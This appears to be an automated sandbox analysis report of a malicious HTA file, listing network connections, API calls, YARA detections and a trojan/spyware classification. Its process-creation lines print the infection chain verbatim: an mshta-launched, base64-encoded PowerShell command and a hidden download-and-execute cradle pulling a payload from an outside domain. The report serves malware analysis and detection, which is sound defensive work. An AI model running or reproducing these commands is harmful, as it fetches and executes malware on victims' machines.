                              Source: unknownHTTPS traffic detected: 172.67.194.161:443 -> 192.168.2.6:57600 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57621 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57628 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57635 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57644 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57654 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57662 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57675 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57694 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.212.45:443 -> 192.168.2.6:57702 version: TLS 1.2
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00435480 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00435480
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00435480 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00435480
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00435D56 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,10_2_00435D56

                              System Summary

                              barindex
                              Malicious sample detected (through community Yara rule)
                              Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04E7C3704_2_04E7C370
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_085E18404_2_085E1840
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_085E18344_2_085E1834
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_085E1DCB4_2_085E1DCB
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA4761B4_2_0AA4761B
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA4F5B84_2_0AA4F5B8
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA4BB904_2_0AA4BB90
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA4BB984_2_0AA4BB98
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA439284_2_0AA43928
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA401604_2_0AA40160
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA401704_2_0AA40170
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA4F1404_2_0AA4F140
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA45C974_2_0AA45C97
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA4DCC84_2_0AA4DCC8
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA64BD14_2_0AA64BD1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA6794B4_2_0AA6794B
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA679504_2_0AA67950
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA646A04_2_0AA646A0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA646914_2_0AA64691
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042100010_2_00421000
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042480110_2_00424801
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040D80A10_2_0040D80A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042E43510_2_0042E435
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041258010_2_00412580
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042767010_2_00427670
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00439FB010_2_00439FB0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040385010_2_00403850
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040607010_2_00406070
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040581010_2_00405810
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043082C10_2_0043082C
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044003010_2_00440030
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004310C710_2_004310C7
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004400D010_2_004400D0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004118DD10_2_004118DD
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043F8E810_2_0043F8E8
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004410F010_2_004410F0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040A0AF10_2_0040A0AF
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004148B010_2_004148B0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041214C10_2_0041214C
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041D95010_2_0041D950
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044017010_2_00440170
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040810010_2_00408100
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041F10010_2_0041F100
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043310010_2_00433100
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041A11010_2_0041A110
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043B1E410_2_0043B1E4
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040918010_2_00409180
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042FA4010_2_0042FA40
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043524010_2_00435240
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041D26010_2_0041D260
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00439A7010_2_00439A70
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040420010_2_00404200
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00427A2010_2_00427A20
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041BAD210_2_0041BAD2
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040AAE010_2_0040AAE0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004072E010_2_004072E0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004192E010_2_004192E0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042CAE010_2_0042CAE0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00408A9010_2_00408A90
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00440A9010_2_00440A90
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00402AB010_2_00402AB0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004262BB10_2_004262BB
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043AB5010_2_0043AB50
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040B36710_2_0040B367
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042DB0E10_2_0042DB0E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00427B1D10_2_00427B1D
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00404B3010_2_00404B30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004413D010_2_004413D0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004283E210_2_004283E2
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042C3E010_2_0042C3E0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00431BEC10_2_00431BEC
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00421BF010_2_00421BF0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043E3F510_2_0043E3F5
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041CBA010_2_0041CBA0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042347510_2_00423475
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00428C1C10_2_00428C1C
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042543E10_2_0042543E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00405CD010_2_00405CD0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043949010_2_00439490
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004404A010_2_004404A0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040650010_2_00406500
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041561310_2_00415613
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043D53010_2_0043D530
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004165C010_2_004165C0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043FDC010_2_0043FDC0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00432DD010_2_00432DD0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004385DB10_2_004385DB
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00440DF010_2_00440DF0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00424DA010_2_00424DA0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00437E4810_2_00437E48
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040965010_2_00409650
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00402E5010_2_00402E50
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041561310_2_00415613
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00419E3010_2_00419E30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042863710_2_00428637
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004296EE10_2_004296EE
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004396F010_2_004396F0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041D6A010_2_0041D6A0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042CEBE10_2_0042CEBE
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00417F5710_2_00417F57
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042170010_2_00421700
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041CF1010_2_0041CF10
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043FF2010_2_0043FF20
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041B73010_2_0041B730
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004187C410_2_004187C4
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00434FD010_2_00434FD0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040CF9910_2_0040CF99
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00426FA010_2_00426FA0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00407F10 appears 52 times
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 004148A0 appears 113 times
                              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 17414
                              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 17414Jump to behavior
                              Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@10/7@4/3
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00439FB0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,10_2_00439FB0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfcwwmgq.gat.ps1Jump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\new-riii-1-b.pub.hta"
                              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQg